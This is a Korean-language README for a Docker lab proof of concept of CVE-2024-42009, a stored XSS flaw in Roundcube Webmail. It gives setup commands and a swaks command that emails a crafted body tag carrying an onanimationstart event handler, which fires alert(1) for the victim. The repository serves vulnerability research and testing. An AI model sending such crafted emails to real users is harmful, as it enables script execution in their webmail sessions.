
CVE-2024-42009에 대한 Docker 기반 개념 증명(PoC)으로, Roundcube Webmail의 저장형 XSS 취약점입니다. 조작된 HTML 이메일을 통한 익스플로잇을 시연하며, 테스트용 취약한 랩 환경을 포함합니다.
이 저장소는 Roundcube Webmail에서 발생하는 CVE-2024-42009(저장형 크로스 사이트 스크립팅, XSS)에 대한 동작하는 개념 증명(PoC)을 제공합니다.
이 취약점은 부적절한 HTML 살균(sanitization) 후 안전하지 않은 속성 재처리로 인해 발생하며, 공격자가 조작된 HTML 이메일을 통해 악성 이벤트 핸들러를 주입할 수 있게 합니다.
Roundcube는 수신 HTML 이메일을 살균하지만, 이후 특정 속성(예: bgcolor, 잘못된 형식의 속성)을 재처리하여 다음과 같은 문제가 발생합니다:
onanimationstart) 재도입이로 인해 피해자가 악성 이메일을 열면 임의의 JavaScript가 실행됩니다.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ 메일 서버가 초기화될 때까지 약 10~15초 기다리세요.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
자격 증명:
swaks 도구를 사용하여 악성 이메일을 전송합니다:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


패치된 버전으로 업그레이드:
이 프로젝트는 교육 및 허가된 보안 연구 목적으로만 사용하십시오. 적절한 허가 없이 시스템에 사용하지 마십시오.